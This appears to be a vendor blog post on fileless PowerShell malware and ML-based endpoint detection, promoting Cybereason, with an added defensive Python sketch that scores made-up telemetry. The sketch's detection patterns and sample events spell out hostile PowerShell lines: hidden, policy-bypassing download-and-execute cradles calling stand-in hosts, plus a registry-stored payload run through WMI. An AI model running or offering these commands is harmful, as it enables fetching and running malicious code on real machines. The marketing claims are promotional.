Employees today are increasingly likely to work from outside the office, employing a variety of endpoint devices — smartphones, laptops, tablets, desktops and more — to complete business tasks. Various surveys indicate that the average U.S. employee uses at least three devices per day for work activities. For all their productivity and collaboration benefits, these devices create multiple avenues for introducing viruses, worms and other malware into an organization.
According to a recent survey by the Ponemon Institute, organizations of all shapes and sizes report they are struggling to manage and secure the ever-increasing number of endpoint devices being used in the workplace. Seventy percent of those surveyed for the firm’s 2017 State of Endpoint Security Risk Report say the risk is increasing.
Traditional antivirus solutions have become inadequate to address emerging threats such as file-less malware, PowerShell attacks and destructive ransomware. According to the Ponemon study, 50 percent of businesses with antivirus were compromised in 2017, with these attacks costing an average of $301 per employee.
In addition to being ineffective, traditional endpoint security measures are difficult and costly to manage. The study found that more than half of all endpoint security alerts are false positives, resulting in companies wasting an average of 425 hours a week investigating the alerts at an average annual cost of $1.37 million.
File-less malware attacks are particularly troublesome for antivirus software. Also called zero-footprint attacks, file-less malware writes no executable to disk. Instead it runs small malicious PowerShell scripts that live only in memory or are stashed in the registry. The scripts perform reconnaissance and collect sensitive information; a memory-only payload then vanishes without a trace when the infected computer is rebooted, while one stored in the registry survives the reboot and is reloaded on the next logon. The "zero-footprint" label is a slight misnomer, since the activity still leaves process-creation, script-block and registry traces, which is exactly what behaviour-based tools look for. According to the Ponemon report, 77 percent of attacks in 2017 were file-less, and such attacks are 10 times more likely to succeed than file-based attacks.
Analytic engines powered by machine learning (ML) are emerging as powerful tools for discovering file-less malware and other subtle threats that lack the usual clues and artifacts of an infection. Unlike traditional signature-based tools that rely on known virus definitions (a hash or byte pattern of a file that has already been seen), ML-based tools "learn" what malicious activity looks like from a variety of traits: command-line flags, the content of decoded scripts, the parent process that launched the interpreter, network and registry access, and similar behaviour. Because those traits are present even when no file is written, this enables them to find zero-footprint malware with far greater speed and accuracy.
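As an added illustration of the two approaches described above (this is example code written for this page, not code from the article or from Cybereason), the following Python sketch contrasts a content-hash "signature" check with a trait-based score over constructed, hypothetical PowerShell telemetry. The event shapes, trait list, weights, threshold and sample command lines are all assumptions; a real engine would learn the weights rather than hard-code them.

```python
import base64
import hashlib
import re

# Hypothetical telemetry in the shape of Sysmon/4688 process-creation events plus
# 4104 script-block text. Constructed for this example, not from any product or report.
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)

# Office, WMI and script hosts rarely have a legitimate reason to spawn PowerShell.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe",
                      "wmiprvse.exe", "mshta.exe", "wscript.exe"}

# Behavioural traits and assumed weights: cheap stand-ins for features an ML engine learns.
TRAITS = {
    "no_profile":        (re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    "hidden_window":     (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    "bypass_policy":     (re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.I), 1),
    "invoke_expression": (re.compile(r"\biex\b|invoke-expression", re.I), 2),
    "download_cradle":   (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I), 2),
    "base64_decode":     (re.compile(r"frombase64string", re.I), 2),
    "registry_payload":  (re.compile(r"get-itemproperty[^;|]*\bhk(?:cu|lm):", re.I), 2),
    "reflective_load":   (re.compile(r"\[(?:system\.)?reflection\.assembly\]::load", re.I), 2),
}
FILELESS_THRESHOLD = 4  # assumed cut-off for the weighted trait score


def encode_command(script):
    """Build a -EncodedCommand blob the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Recover the script hidden behind -EncodedCommand, or "" if there is none."""
    m = ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


# A single "known" sample stands in for the antivirus definition database.
KNOWN_SAMPLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')"
KNOWN_BAD_HASHES = {hashlib.sha256(KNOWN_SAMPLE.encode()).hexdigest()}


def signature_match(text):
    """Traditional check: exact content hash against known definitions."""
    return hashlib.sha256(text.encode()).hexdigest() in KNOWN_BAD_HASHES


def analyse(event):
    """Score one event both ways and return the richer of the two verdicts."""
    decoded = decode_encoded_command(event["cmdline"])
    # Strip the base64 blob before matching so its random letters cannot trigger traits.
    visible = ENCODED.sub(" ", event["cmdline"])
    text = " ".join([visible, decoded, event["script"]])
    hits = [name for name, (rx, _) in TRAITS.items() if rx.search(text)]
    score = sum(TRAITS[n][1] for n in hits)
    if decoded:
        hits.append("encoded_command")
        score += 2
    if event["parent"].lower() in SUSPICIOUS_PARENTS:
        hits.append("suspicious_parent")
        score += 2
    sig = any(signature_match(t) for t in (event["script"], decoded) if t)
    if sig:
        verdict = "known_malware"
    elif score >= FILELESS_THRESHOLD:
        verdict = "fileless_suspect"
    else:
        verdict = "benign"
    return {"id": event["id"], "signature": sig, "traits": sorted(hits),
            "score": score, "verdict": verdict}


def hunt(events):
    """Map event id -> analysis result for a batch of events."""
    return {r["id"]: r for r in (analyse(e) for e in events)}


SAMPLE_EVENTS = [  # constructed sample input
    {"id": 1, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Logs",
     "script": "Get-ChildItem C:\\Logs"},
    # Memory-only cradle launched from a Word document: nothing is written to disk.
    {"id": 2, "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_command(
         "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')"),
     "script": ""},
    # Registry-resident payload pulled back and executed via WMI (hypothetical key).
    {"id": 3, "parent": "wmiprvse.exe", "image": "powershell.exe",
     "cmdline": ('powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass '
                 '-Command "$p=(Get-ItemProperty HKCU:\\Software\\Contoso\\Cache).Blob; '
                 'IEX([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($p)))"'),
     "script": ""},
    # Classic file-based sample whose script block matches a known definition.
    {"id": 4, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Users\\alice\\Downloads\\update.ps1",
     "script": KNOWN_SAMPLE},
]

if __name__ == "__main__":
    for r in hunt(SAMPLE_EVENTS).values():
        print(r["id"], r["verdict"], "sig=%s" % r["signature"], r["score"], r["traits"])
```

Only event 4 is caught by the hash check; events 2 and 3, which never touch disk, are caught solely by the combination of traits, and the decoded `-EncodedCommand` payload is scanned as if it were plain text.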
For this reason, we have begun working with many of our customers to implement Cybereason’s analytics-driven endpoint security solution to deal with these new, sophisticated threats. The solution ranks near the top of Gartner’s Peer Insights in the Endpoint Detection & Response Solutions market with an overall rating of 4.7 out of 5.0.
Cybereason’s solution is powered by a proprietary data analytics engine known as the “Hunting Engine.” It continually monitors every endpoint on the network through an interrogation process, asking 8 million questions per second. The Hunting Engine remembers and relates all this data, using it to connect seemingly unrelated or benign events to reveal malicious activity.
The rise of mobile and cloud computing has contributed to a steep increase in the number of devices being used to conduct business. Organizations must take steps to secure those devices, but traditional signature-based antivirus tools are no match for an emerging class of stealthy threats. With their ability to rapidly examine endpoint data to identify malicious patterns, analytics-driven solutions such as Cybereason are becoming essential to endpoint security.